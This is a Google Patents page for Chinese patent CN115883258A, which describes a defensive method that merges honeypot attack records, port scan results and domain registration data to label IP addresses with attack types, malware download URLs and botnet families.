CN115883258A - IP information processing method, device, electronic equipment and storage medium - Google Patents
IP information processing method, device, electronic equipment and storage medium Download PDFInfo
- Publication number
- CN115883258A CN115883258A CN202310114335.5A CN202310114335A CN115883258A CN 115883258 A CN115883258 A CN 115883258A CN 202310114335 A CN202310114335 A CN 202310114335A CN 115883258 A CN115883258 A CN 115883258A
- Authority
- CN
- China
- Prior art keywords
- information data
- attack
- port
- address
- attacker
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Granted
Links
Images
Classifications
-
- Y—GENERAL TAGGING OF NEW TECHNOLOGICAL DEVELOPMENTS; GENERAL TAGGING OF CROSS-SECTIONAL TECHNOLOGIES SPANNING OVER SEVERAL SECTIONS OF THE IPC; TECHNICAL SUBJECTS COVERED BY FORMER USPC CROSS-REFERENCE ART COLLECTIONS [XRACs] AND DIGESTS
- Y02—TECHNOLOGIES OR APPLICATIONS FOR MITIGATION OR ADAPTATION AGAINST CLIMATE CHANGE
- Y02D—CLIMATE CHANGE MITIGATION TECHNOLOGIES IN INFORMATION AND COMMUNICATION TECHNOLOGIES [ICT], I.E. INFORMATION AND COMMUNICATION TECHNOLOGIES AIMING AT THE REDUCTION OF THEIR OWN ENERGY USE
- Y02D30/00—Reducing energy consumption in communication networks
- Y02D30/50—Reducing energy consumption in communication networks in wire-line communication networks, e.g. low power modes or reduced link rate
Landscapes
- Data Exchanges In Wide-Area Networks (AREA)
- Computer And Data Communications (AREA)
Abstract
The application provides an IP information processing method, an IP information processing device, electronic equipment and a storage medium, wherein the IP information processing method comprises the steps of obtaining IP port service information data, IP attack information data and IP basic information data, wherein the IP port service information data are collected by a network space detection system, and the IP attack information data are collected by an internet honeypot system; analyzing the service information data based on the IP port, the IP attack information data and the IP basic information data to generate IP context information. The method and the device can generate more comprehensive IP context information and improve the accuracy of the IP context information.
Description
Technical Field
The present application relates to the field of computer technologies, and in particular, to an IP information processing method and apparatus, an electronic device, and a storage medium.
Background
With the recent years, the network security field is more and more emphasized by the nation and the society. A large number of attackers appearing in the Internet use a vulnerability scanning tool (vulnerability scanning tool: judging whether a target IP service has a vulnerability) to scan the services in the IP Internet of the whole network, thereby obtaining IP context information.
However, the IP context information in the prior art has the disadvantages of incompleteness and low accuracy.
Disclosure of Invention
An object of the embodiments of the present application is to provide an IP information processing method, an IP information processing apparatus, an electronic device, and a storage medium, so as to generate more comprehensive IP context information and improve accuracy of the IP context information.
In a first aspect, the present invention provides an IP information processing method, where the method includes:
acquiring IP port service information data, IP attack information data and IP basic information data, wherein the IP port service information data is acquired by a network space detection system, and the IP attack information data is acquired by an internet honeypot system;
analyzing the service information data based on the IP port, the IP attack information data and the IP basic information data to generate IP context information.
In the first aspect of the present application, by obtaining IP port service information data, IP attack information data, and IP basic information data, wherein the IP port service information data is collected by a network space detection system, and the IP attack information data is collected by an internet honeypot system, it is possible to analyze the IP port service information data, the IP attack information data, and the IP basic information data to generate IP context information. Compared with the prior art, the IP context information is generated based on the IP port service information data, the IP attack information data and the IP basic information data, so that the method is more comprehensive and has higher accuracy.
In an optional embodiment, the IP attack information data includes: the method comprises the steps of obtaining a source IP of an attacker, a source port of the attacker, an HTTP request method of the attacker, a target service type of the attack of the attacker, a target port of the attack of the attacker, a user agent of the HTTP request of the attacker, a URL address of the request of the attacker and a value of a POST packet sent by the attacker;
and, the IP port service information data includes: the open port of the target IP, the details of the response packet, the service name and the version information;
and the IP basic information data comprises the geographic position of the target IP, the domain name resolved by the target IP, a domain name registrant of the domain name resolved by the target IP and a mailbox of the domain name resolved by the target IP.
In the above optional implementation manner, more comprehensive and more accurate IP context information may be generated through data such as a source IP of an attacker, a source port of the attacker, an HTTP request method of the attacker, a target service type of the attack of the attacker, and a target port of the attack of the attacker.
In an optional implementation manner, after the acquiring IP port service information data, IP attack information data, and IP basic information data, before the analyzing the IP port service information data, the IP attack information data, and the IP basic information data to generate IP context information, the method further includes:
and associating and storing the IP port service information data, the IP attack information data and the IP basic information data through a unique IP address.
In the above optional embodiment, the IP analysis efficiency may be improved by associating and storing the IP port service information data, the IP attack information data, and the IP basic information data with a unique IP address.
In an optional embodiment, the analyzing the service information data based on the IP port, the IP attack information data, and the IP basic information data to generate IP context information includes:
matching URL addresses based on the values of the POST packets sent by the attacker, and obtaining a first URL address set;
filtering normal websites in the first URL address set based on a white list to obtain a second URL address set;
downloading a file associated with each URL address in the second URL address set;
scanning the file associated with each URL address based on a antivirus engine, wherein if the scanning result represents that the file associated with the URL address is a malicious file, the URL address is stored in a Trojan download address field of a current IP address, and a Hash value of the malicious file and the scanning result are stored in a sample set;
comparing the value of the POST packet sent by the attacker with a preset vulnerability characteristic, if the value of the POST packet sent by the attacker hits the preset vulnerability characteristic, marking the vulnerability type of the current IP address, and determining that the penetration attack exists in the current IP address;
judging whether the HTTP request method of the attacker is GET or not, and comparing the IP attack information data with the vulnerability characteristics;
and when the HTTP request method of the attacker is GET and the comparison result represents that no character feature of the exploit is existed in the IP attack information, determining that the scanning attack exists in the current IP address.
In the above optional embodiment, a first URL address set can be obtained based on a URL address matching value of a POST packet sent by the attacker, a normal website in the first URL address set is filtered based on a white list, a second URL address set can be obtained, a file associated with each URL address in the second URL address set can be downloaded, and a file associated with each URL address can be scanned based on an antivirus engine, where if a scan result indicates that the file associated with the URL address is a malicious file, the URL address is stored in a trojan download address field of a current IP address, and a Hash value of the malicious file and the scan result are stored in a sample set. On the other hand, the value of the POST packet sent by the attacker is compared with the preset vulnerability characteristics, and then when the value of the POST packet sent by the attacker hits the preset vulnerability characteristics, the vulnerability type of the current IP address can be marked, and the penetration attack of the current IP address is determined. On the other hand, by judging whether the HTTP request method of the attacker is GET or not and comparing the IP attack information data with the vulnerability characteristics, when the HTTP request method of the attacker is GET and the comparison result represents that no character characteristics of vulnerability utilization exist in the IP attack information, the scanning attack on the current IP address can be determined.
In an optional embodiment, the analyzing the service information data based on the IP port, the IP attack information data, and the IP basic information data to generate IP context information further includes:
judging whether the UserAgents of the HTTP requests of the attackers are more than 5, if so, determining that the attackers have the automatic scanning attack with hiding capability;
and judging whether the user agent of the HTTP request of the attacker has botnet character characteristics or not, and if so, performing botnet family marking on the current IP address.
In the above optional embodiment, it can be determined that the attacker has the hiding capability for the automated scanning attack by determining whether the number of the user agents of the HTTP request of the attacker is greater than 5. On the other hand, whether the user agent of the HTTP request of the attacker has botnet character characteristics or not is judged, and then botnet family marking can be carried out on the current IP address.
In an optional embodiment, the analyzing the service information data based on the IP port, the IP attack information data, and the IP basic information data to generate IP context information further includes:
judging whether the open port of the target IP is a 22 port or not, and if so, determining that the current IP address is the IP address of the linux server;
and judging whether the open port of the target IP is a 3389 port, and if so, determining that the current IP address is the IP address of the windows server.
In the above optional embodiment, it can be determined that the current IP address is the IP address of the linux server by determining whether the port opened by the target IP is a 22-port. On the other hand, whether the port opened by the target IP is a 3389 port or not can be judged, and then it can be determined that the current IP address is the IP address of the windows server.
In an optional embodiment, the analyzing the service information data based on the IP port, the IP attack information data, and the IP basic information data to generate IP context information further includes:
judging whether the domain name resolved by the target IP, the domain name registrant of the domain name resolved by the target IP and the mailbox of the domain name resolved by the target IP have data, if so, storing the domain name resolved by the target IP, the domain name registrant of the domain name resolved by the target IP and the mailbox of the domain name resolved by the target IP.
In the above optional embodiment, by determining whether the domain name resolved by the target IP, the domain name registrar of the domain name resolved by the target IP, and the mailbox of the domain name resolved by the target IP have data, the domain name resolved by the target IP, the domain name registrar of the domain name resolved by the target IP, and the mailbox of the domain name resolved by the target IP can be stored.
In a second aspect, the present invention provides an IP information processing apparatus, comprising:
the system comprises an acquisition module, a network space detection module and an Internet honeypot system, wherein the acquisition module is used for acquiring IP port service information data, IP attack information data and IP basic information data, the IP port service information data is acquired by the network space detection system, and the IP attack information data is acquired by the Internet honeypot system;
and the analysis module is used for analyzing the service information data based on the IP port, the IP attack information data and the IP basic information data so as to generate IP context information.
The device of the second aspect of the present application can acquire IP port service information data, IP attack information data, and IP basic information data by executing the IP information processing method, wherein the IP port service information data is acquired by a network space detection system, and the IP attack information data is acquired by an internet honeypot system, and further can analyze the IP port service information data, the IP attack information data, and the IP basic information data to generate IP context information. Compared with the prior art, the IP context information is generated based on the IP port service information data, the IP attack information data and the IP basic information data, so that the method is more comprehensive and has higher accuracy.
In a third aspect, the present invention provides an electronic device comprising:
a processor; and
a memory configured to store machine readable instructions that, when executed by the processor, perform the IP information processing method of any of the preceding embodiments.
The electronic device of the third aspect of the present application can acquire IP port service information data, IP attack information data, and IP basic information data by executing an IP information processing method, where the IP port service information data is acquired by a network space detection system, and the IP attack information data is acquired by an internet honeypot system, and further can analyze the IP port service information data, the IP attack information data, and the IP basic information data to generate IP context information. Compared with the prior art, the IP context information is generated based on the IP port service information data, the IP attack information data and the IP basic information data, so that the method is more comprehensive and has higher accuracy.
In a fourth aspect, the present invention provides a storage medium storing a computer program for executing the IP information processing method according to any one of the preceding embodiments by a processor.
The fourth storage medium of the present application can acquire IP port service information data, IP attack information data, and IP basic information data by executing an IP information processing method, wherein the IP port service information data is acquired by a network space detection system, and the IP attack information data is acquired by an internet honeypot system, and further can analyze the IP port service information data, the IP attack information data, and the IP basic information data to generate IP context information. Compared with the prior art, the IP context information is generated based on the IP port service information data, the IP attack information data and the IP basic information data, so that the method is more comprehensive and has higher accuracy.
Drawings
In order to more clearly illustrate the technical solutions of the embodiments of the present application, the drawings that are required to be used in the embodiments of the present application will be briefly described below, it should be understood that the following drawings only illustrate some embodiments of the present application and therefore should not be considered as limiting the scope, and that those skilled in the art can also obtain other related drawings based on the drawings without inventive efforts.
Fig. 1 is a schematic flowchart of an IP information processing method disclosed in an embodiment of the present application;
fig. 2 is a schematic structural diagram of an IP information processing apparatus disclosed in an embodiment of the present application;
fig. 3 is a schematic structural diagram of an electronic device disclosed in an embodiment of the present application.
Detailed Description
The technical solutions in the embodiments of the present application will be described below with reference to the drawings in the embodiments of the present application.
Example one
Referring to fig. 1, fig. 1 is a schematic flow chart of an IP information processing method disclosed in an embodiment of the present application, and as shown in fig. 1, the method in the embodiment of the present application includes the following steps:
101. acquiring IP port service information data, IP attack information data and IP basic information data, wherein the IP port service information data is acquired by a network space detection system, and the IP attack information data is acquired by an internet honeypot system;
102. analyzing the service information data based on the IP port, the IP attack information data and the IP basic information data to generate IP context information.
In the embodiment of the application, by acquiring the service information data of the IP port, the IP attack information data and the IP basic information data, wherein the service information data of the IP port is acquired by a network space detection system, and the IP attack information data is acquired by an Internet honeypot system, the service information data, the IP attack information data and the IP basic information data based on the IP port can be analyzed to generate the IP context information. Compared with the prior art, the IP context information is generated based on the IP port service information data, the IP attack information data and the IP basic information data, so that the method is more comprehensive and has higher accuracy.
In this embodiment, for step 101, the obtained IP port service information data, IP attack information data, and IP basic information data include data related to a plurality of IP addresses, for example, the IP port service information data, IP attack information data, and IP basic information data of an IP address a, and the IP port service information data, IP attack information data, and IP basic information data of an IP address B.
In the embodiment of the present application, for step 101, please refer to the prior art for a related description of a network space detection system, which is not described in detail in the embodiment of the present application. On the other hand, please refer to the prior art for an internet honeypot system, which is not described in detail in the embodiments of the present application.
In the embodiment of the present application, for step 102, the IP context information refers to the result obtained by analyzing the IP port service information-based data, the IP attack information data and the IP basic information data, for example, in the process of analyzing the files associated with each URL address based on the antivirus engine scanning,
if the scanning result represents that the file associated with the URL address is a malicious file, the IP context information comprises a Trojan download address field, wherein the Trojan download address field points to the URL address capable of downloading the malicious file.
In this embodiment, as an optional implementation manner, the IP attack information data includes: the method comprises the steps of a source IP of an attacker, a source port of the attacker, an HTTP request method of the attacker, a target service type of the attack of the attacker, a target port of the attack of the attacker, a user agent of the HTTP request of the attacker, a URL address of the request of the attacker and a value of a POST packet sent by the attacker. On the other hand, the IP port service information data includes: port opened by the target IP, response packet details, service name and version information. In another aspect, the IP-based information data includes a geographic location of the target IP, a domain name resolved by the target IP, a domain name registrar for the domain name resolved by the target IP, and a mailbox for the domain name resolved by the target IP.
In the above optional implementation manner, more comprehensive and more accurate IP context information can be generated through data such as the source IP of the attacker, the source port of the attacker, the HTTP request method of the attacker, the target service type of the attack of the attacker, and the target port of the attack of the attacker.
In the above alternative embodiment, the IP infrastructure data may be provided by a third party platform.
In an alternative embodiment, in step 101: after acquiring the IP port service information data, the IP attack information data, and the IP basic information data, step 102: before analyzing the service information data, the IP attack information data and the IP basic information data based on the IP port to generate the IP context information, the method of the embodiment of the present application further includes the following steps:
and associating and storing the IP port service information data, the IP attack information data and the IP basic information data through the unique IP address.
In the above optional embodiment, the IP analysis efficiency can be improved by associating and storing the IP port service information data, the IP attack information data, and the IP basic information data with the unique IP address.
In the above alternative embodiment, associating and storing the IP port service information data, the IP attack information data and the IP basic information data by a unique IP address means that data belonging to the same IP address are associated under one IP address, for example, assuming that there are two data records, which are respectively IP port service information data a and IP port service information data B, if the IP address of the IP port service information data B is the IP address in the IP port service information data a, the IP port service information data a and the IP port service information data B are associated together, that is, the two data records are associated by the IP address.
In the first aspect of the present application, as an optional implementation manner, step 102: analyzing the service information data, the IP attack information data and the IP basic information data based on the IP port to generate IP context information, and comprising the following substeps:
matching URL addresses based on the value of a POST packet sent by an attacker, and obtaining a first URL address set;
filtering normal websites in the first URL address set based on the white list to obtain a second URL address set;
downloading a file associated with each URL address in the second URL address set;
scanning the file associated with each URL address based on the antivirus engine, wherein if the scanning result represents that the file associated with the URL address is a malicious file, the URL address is stored in a Trojan horse downloading address field of the current IP address, and the Hash value of the malicious file and the scanning result are stored in a sample set;
comparing the value of the POST packet sent by the attacker with a preset vulnerability characteristic, if the value of the POST packet sent by the attacker hits the preset vulnerability characteristic, marking the vulnerability type of the current IP address, and determining that the penetration attack exists in the current IP address;
judging whether the HTTP request method of the attacker is GET or not, and comparing the IP attack information data with the vulnerability characteristics;
and when the HTTP request method of the attacker is GET and the comparison result represents that no character feature of the exploit is existed in the IP attack information, determining that the scanning attack exists in the current IP address.
In the above optional embodiment, the URL address is matched based on the value of the POST packet sent by the attacker, the first URL address set can be obtained, the normal website in the first URL address set is filtered based on the white list, the second URL address set can be obtained, the file associated with each URL address in the second URL address set can be downloaded, and the file associated with each URL address can be scanned based on the antivirus engine, wherein if the scan result represents that the file associated with the URL address is a malicious file, the URL address is stored in the trojan download address field of the current IP address, and the Hash value of the malicious file and the scan result are stored in the sample set. On the other hand, the value of the POST packet sent by the attacker is compared with the preset vulnerability characteristics, and then when the value of the POST packet sent by the attacker hits the preset vulnerability characteristics, the vulnerability type of the current IP address can be marked, and the penetration attack of the current IP address is determined. On the other hand, whether the HTTP request method of the attacker is GET or not is judged, IP attack information data is compared with vulnerability characteristics, and then when the HTTP request method of the attacker is GET and the comparison result represents that character characteristics of vulnerability utilization do not exist in the IP attack information, the fact that scanning attack exists in the current IP address can be determined.
In this embodiment of the present application, as an optional implementation manner, step 102: analyzing the service information data, the IP attack information data and the IP basic information data based on the IP port to generate IP context information, and further comprising the following substeps:
judging whether the UserAgents of the HTTP requests of the attackers are more than 5, if so, determining that the attackers have the automatic scanning attack with hiding capability;
and judging whether the UserAgents of the HTTP requests of the attackers have botnet character characteristics or not, and if so, carrying out botnet family marking on the current IP address.
In the above optional embodiment, it can be determined that the attacker has the hiding capability for the automated scanning attack by determining whether the user agents of the HTTP requests of the attacker are greater than 5. On the other hand, whether the user agent of the HTTP request of the attacker has botnet character characteristics or not is judged, and then botnet family marking can be carried out on the current IP address.
In the above alternative embodiment, as an example, the current IP address may be labeled as one of the Mirai family, the kinsing botnet family.
In the embodiment of the present application, as an optional implementation manner, step 102: analyzing the service information data, the IP attack information data and the IP basic information data based on the IP port to generate IP context information, and further comprising the following steps of:
judging whether the open port of the target IP is a 22 port or not, and if so, determining that the current IP address is the IP address of the linux server;
and judging whether the open port of the target IP is a 3389 port or not, and if so, determining that the current IP address is the IP address of the windows server.
In the above optional embodiment, it can be determined that the current IP address is the IP address of the linux server by determining whether the port opened by the target IP is a 22 port. On the other hand, whether the port opened by the target IP is a 3389 port or not can be judged, and then the current IP address can be determined to be the IP address of the windows server. It should be noted that, in the above alternative embodiment, the 22 port is used for performing ssh service.
In the embodiment of the present application, as an optional implementation manner, step 102: analyzing the service information data, the IP attack information data and the IP basic information data based on the IP port to generate IP context information, and further comprising the following steps of:
judging whether the domain name resolved by the target IP, the domain name registrant of the domain name resolved by the target IP and the mailbox of the domain name resolved by the target IP have data, and if so, storing the domain name resolved by the target IP, the domain name registrant of the domain name resolved by the target IP and the mailbox of the domain name resolved by the target IP.
In the above optional embodiment, by determining whether the domain name resolved by the target IP, the domain name registrar of the domain name resolved by the target IP, and the mailbox of the domain name resolved by the target IP have data, the domain name resolved by the target IP, the domain name registrar of the domain name resolved by the target IP, and the mailbox of the domain name resolved by the target IP can be stored.
In the embodiment of the present application, as an optional implementation manner, the method of the embodiment of the present application further includes the following steps:
and displaying the IP context information.
Example two
Referring to fig. 2, fig. 2 is a schematic structural diagram of an IP information processing apparatus disclosed in an embodiment of the present application, and as shown in fig. 2, the apparatus in the embodiment of the present application includes the following functional modules:
an obtaining module 201, configured to obtain IP port service information data, IP attack information data, and IP basic information data, where the IP port service information data is collected by a network space detection system, and the IP attack information data is collected by an internet honeypot system;
the analysis module 202 is configured to analyze the service information data based on the IP port, the IP attack information data, and the IP basic information data to generate IP context information.
The device can acquire the IP port service information data, the IP attack information data and the IP basic information data by executing the IP information processing method, wherein the IP port service information data is acquired by a network space detection system, the IP attack information data is acquired by an Internet honeypot system, and the IP port service information data, the IP attack information data and the IP basic information data are analyzed to generate the IP context information. Compared with the prior art, the IP context information is generated based on the IP port service information data, the IP attack information data and the IP basic information data, so that the method is more comprehensive and has higher accuracy.
EXAMPLE III
Referring to fig. 3, fig. 3 is a schematic structural diagram of an electronic device disclosed in an embodiment of the present application, and as shown in fig. 3, the electronic device in the embodiment of the present application includes:
a processor 301; and
a memory 302 configured to store machine readable instructions that, when executed by the processor 301, perform the IP information processing method according to any one of the preceding embodiments.
The electronic device of the embodiment of the application can acquire the IP port service information data, the IP attack information data and the IP basic information data by executing the IP information processing method, wherein the IP port service information data is acquired by a network space detection system, the IP attack information data is acquired by an Internet honeypot system, and the IP port service information data, the IP attack information data and the IP basic information data are analyzed to generate the IP context information. Compared with the prior art, the IP context information is generated based on the IP port service information data, the IP attack information data and the IP basic information data, so that the method is more comprehensive and has higher accuracy.
Example four
An embodiment of the present application provides a storage medium, which stores a computer program, and the computer program is executed by a processor to execute the IP information processing method according to any one of the foregoing embodiments.
The storage medium of the embodiment of the application can acquire the service information data of the IP port, the IP attack information data and the IP basic information data by executing the IP information processing method, wherein the service information data of the IP port is acquired by a network space detection system, and the IP attack information data is acquired by an Internet honeypot system, so that the service information data, the IP attack information data and the IP basic information data based on the IP port can be analyzed to generate the IP context information. Compared with the prior art, the IP context information is generated based on the IP port service information data, the IP attack information data and the IP basic information data, so that the method is more comprehensive and has higher accuracy.
In the embodiments provided in the present application, it should be understood that the disclosed apparatus and method may be implemented in other ways. The above-described apparatus embodiments are merely illustrative, and for example, a division of a unit is only a logical division, and other divisions may be realized in practice, and for example, a plurality of units or components may be combined or integrated into another system, or some features may be omitted, or not executed. In addition, the shown or discussed coupling or direct coupling or communication connection between each other may be through some communication interfaces, indirect coupling or communication connection between devices or units, and may be in an electrical, mechanical or other form.
In addition, units described as separate parts may or may not be physically separate, and parts displayed as units may or may not be physical units, may be located in one place, or may be distributed on a plurality of network units. Some or all of the units can be selected according to actual needs to achieve the purpose of the solution of the embodiment.
Furthermore, the functional modules in the embodiments of the present application may be integrated together to form an independent part, or each module may exist separately, or two or more modules may be integrated to form an independent part.
It should be noted that the functions, if implemented in the form of software functional modules and sold or used as independent products, may be stored in a computer readable storage medium. Based on such understanding, the technical solutions of the present application or portions thereof that substantially contribute to the prior art may be embodied in the form of a software product, which is stored in a storage medium and includes several instructions for causing a computer device (which may be a personal computer, a server, or a network device) to execute all or part of the steps of the methods according to the embodiments of the present application. And the aforementioned storage medium includes: various media capable of storing program codes, such as a usb disk, a removable hard disk, a Read-only Memory (ROM), a Random Access Memory (RAM), a magnetic disk, or an optical disk.
In this document, relational terms such as first and second, and the like may be used solely to distinguish one entity or action from another entity or action without necessarily requiring or implying any actual such relationship or order between such entities or actions.
The above embodiments are merely examples of the present application and are not intended to limit the scope of the present application, and various modifications and changes may be made by those skilled in the art. Any modification, equivalent replacement, or improvement made within the spirit and principle of the present application shall be included in the protection scope of the present application.
Claims (12)
1. An IP information processing method, characterized in that the method comprises:
acquiring IP port service information data, IP attack information data and IP basic information data, wherein the IP port service information data is acquired by a network space detection system, and the IP attack information data is acquired by an Internet honeypot system;
analyzing the service information data based on the IP port, the IP attack information data and the IP basic information data to generate IP context information.
2. The method of claim 1, wherein the IP attack information data comprises: the method comprises the steps of obtaining a source IP of an attacker, a source port of the attacker, an HTTP request method of the attacker, a target service type of the attack of the attacker, a target port of the attack of the attacker, a user agent of the HTTP request of the attacker, a URL address of the request of the attacker and a value of a POST packet sent by the attacker;
and, the IP port service information data includes: the open port of the target IP, the details of the response packet, the service name and the version information;
and the IP basic information data comprises the geographic position of the target IP, the domain name resolved by the target IP, a domain name registrant of the domain name resolved by the target IP and a mailbox of the domain name resolved by the target IP.
3. The method of claim 2, wherein after the obtaining IP port service information data, IP attack information data, and IP grounding information data, the analyzing based on the IP port service information data, the IP attack information data, and the IP grounding information data to generate IP context information, the method further comprises:
associating and storing the IP port service information data, the IP attack information data and the IP basic information data through a unique IP address.
4. The method of claim 3, wherein the analyzing based on the IP port service information data, the IP attack information data, and the IP grounding information data to generate IP context information comprises:
matching URL addresses based on the value of the POST packet sent by the attacker, and obtaining a first URL address set;
filtering normal websites in the first URL address set based on a white list to obtain a second URL address set;
downloading a file associated with each URL address in the second URL address set;
and scanning the file associated with each URL address based on a antivirus engine, wherein if the scanning result represents that the file associated with the URL address is a malicious file, the URL address is stored in a Trojan download address field of the current IP address, and the HashHash value of the malicious file and the scanning result are stored in a sample set.
5. The method of claim 3, wherein the analyzing based on the IP port service information data, the IP attack information data, and the IP grounding information data to generate IP context information comprises:
and comparing the value of the POST packet sent by the attacker with a preset vulnerability characteristic, if the value of the POST packet sent by the attacker hits the preset vulnerability characteristic, marking the vulnerability type of the current IP address, and determining that the penetration attack exists in the current IP address.
6. The method of claim 3, wherein the analyzing based on the IP port service information data, the IP attack information data, and the IP grounding information data to generate IP context information comprises:
judging whether the HTTP request method of the attacker is GET or not, and comparing the IP attack information data with the vulnerability characteristics;
and when the HTTP request method of the attacker is GET and the comparison result represents that the character features of the vulnerability are not utilized in the IP attack information, determining that the scanning attack exists in the current IP address.
7. The method of claim 3, wherein the analyzing based on the IP port service information data, the IP attack information data, and the IP grounding information data to generate IP context information comprises:
judging whether the UserAgents of the HTTP requests of the attackers are more than 5, if so, determining that the attackers have the automatic scanning attack with hiding capability;
and judging whether the UserAgent of the HTTP request of the attacker has botnet character characteristics or not, and if so, performing botnet family marking on the current IP address.
8. The method of claim 3, wherein the analyzing based on the IP port service information data, the IP attack information data, and the IP grounding information data to generate IP context information comprises:
judging whether the open port of the target IP is a 22 port or not, and if so, determining that the current IP address is the IP address of the linux server;
and judging whether the open port of the target IP is a 3389 port or not, and if so, determining that the current IP address is the IP address of the windows server.
9. The method of claim 3, wherein the analyzing based on the IP port service information data, the IP attack information data, and the IP grounding information data to generate IP context information comprises:
judging whether the domain name resolved by the target IP, the domain name registrant of the domain name resolved by the target IP and the mailbox of the domain name resolved by the target IP have data, if so, storing the domain name resolved by the target IP, the domain name registrant of the domain name resolved by the target IP and the mailbox of the domain name resolved by the target IP.
10. An IP information processing apparatus, characterized in that the apparatus comprises:
the system comprises an acquisition module, a network space detection module and an Internet honeypot system, wherein the acquisition module is used for acquiring IP port service information data, IP attack information data and IP basic information data, the IP port service information data is acquired by the network space detection system, and the IP attack information data is acquired by the Internet honeypot system;
and the analysis module is used for analyzing the service information data based on the IP port, the IP attack information data and the IP basic information data so as to generate IP context information.
11. An electronic device, comprising:
a processor; and
a memory configured to store machine readable instructions that, when executed by the processor, perform the IP information processing method of any one of claims 1-7.
12. A storage medium characterized in that the storage medium stores a computer program which is executed by a processor to execute the IP information processing method according to any one of claims 1 to 7.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202310114335.5A CN115883258B (en) | 2023-02-15 | 2023-02-15 | IP information processing method, device, electronic equipment and storage medium |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202310114335.5A CN115883258B (en) | 2023-02-15 | 2023-02-15 | IP information processing method, device, electronic equipment and storage medium |
Publications (2)
| Publication Number | Publication Date |
|---|---|
| CN115883258A true CN115883258A (en) | 2023-03-31 |
| CN115883258B CN115883258B (en) | 2023-08-01 |
Family
ID=85761149
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN202310114335.5A Active CN115883258B (en) | 2023-02-15 | 2023-02-15 | IP information processing method, device, electronic equipment and storage medium |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN115883258B (en) |
Citations (5)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| JP2010021977A (en) * | 2008-06-13 | 2010-01-28 | Panasonic Corp | Method, system, and device for network signaling |
| CN110149350A (en) * | 2019-06-24 | 2019-08-20 | 国网安徽省电力有限公司信息通信分公司 | A kind of associated assault analysis method of alarm log and device |
| CN114667532A (en) * | 2018-10-15 | 2022-06-24 | 贝宝公司 | Multidimensional drift nuance intelligence threat engine |
| CN115086330A (en) * | 2022-06-14 | 2022-09-20 | 亚信科技(中国)有限公司 | Cross-cluster load balancing system |
| CN115277102A (en) * | 2022-06-29 | 2022-11-01 | 北京天融信网络安全技术有限公司 | Network attack detection method and device, electronic equipment and storage medium |
-
2023
- 2023-02-15 CN CN202310114335.5A patent/CN115883258B/en active Active
Patent Citations (5)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| JP2010021977A (en) * | 2008-06-13 | 2010-01-28 | Panasonic Corp | Method, system, and device for network signaling |
| CN114667532A (en) * | 2018-10-15 | 2022-06-24 | 贝宝公司 | Multidimensional drift nuance intelligence threat engine |
| CN110149350A (en) * | 2019-06-24 | 2019-08-20 | 国网安徽省电力有限公司信息通信分公司 | A kind of associated assault analysis method of alarm log and device |
| CN115086330A (en) * | 2022-06-14 | 2022-09-20 | 亚信科技(中国)有限公司 | Cross-cluster load balancing system |
| CN115277102A (en) * | 2022-06-29 | 2022-11-01 | 北京天融信网络安全技术有限公司 | Network attack detection method and device, electronic equipment and storage medium |
Also Published As
| Publication number | Publication date |
|---|---|
| CN115883258B (en) | 2023-08-01 |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| US20180219907A1 (en) | Method and apparatus for detecting website security | |
| US8359651B1 (en) | Discovering malicious locations in a public computer network | |
| CN106992981B (en) | Website backdoor detection method and device and computing equipment | |
| CN109889511B (en) | Process DNS activity monitoring method, equipment and medium | |
| CN112887341B (en) | External threat monitoring method | |
| CN114006778B (en) | Threat information identification method and device, electronic equipment and storage medium | |
| CN107888606B (en) | Domain name credit assessment method and system | |
| CN111104579A (en) | Identification method and device for public network assets and storage medium | |
| US11270001B2 (en) | Classification apparatus, classification method, and classification program | |
| US20210006592A1 (en) | Phishing Detection based on Interaction with End User | |
| CN111488572A (en) | User behavior analysis log generation method and device, electronic equipment and medium | |
| CN115865525B (en) | Log data processing method, device, electronic equipment and storage medium | |
| CN109309665B (en) | Access request processing method and device, computing device and storage medium | |
| JP6169497B2 (en) | Connection destination information determination device, connection destination information determination method, and program | |
| CN113079157A (en) | Method and device for acquiring network attacker position and electronic equipment | |
| US20130275384A1 (en) | System, method, and computer program product for determining whether an electronic mail message is unwanted based on processing images associated with a link in the electronic mail message | |
| JP6823205B2 (en) | Collection device, collection method and collection program | |
| CN115102785B (en) | Automatic tracing system and method for network attack | |
| CN116455620A (en) | Malicious domain name access analysis and determination method | |
| CN113364780B (en) | Network attack victim determination method, equipment, storage medium and device | |
| CN115883258B (en) | IP information processing method, device, electronic equipment and storage medium | |
| JP5639535B2 (en) | Benign domain name exclusion device, benign domain name exclusion method, and program | |
| CN116015800A (en) | Scanner identification method and device, electronic equipment and storage medium | |
| CN115913634A (en) | Network security abnormity detection method and system based on deep learning | |
| CN115001724B (en) | Network threat intelligence management method, device, computing equipment and computer readable storage medium |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| PB01 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| GR01 | Patent grant | ||
| GR01 | Patent grant |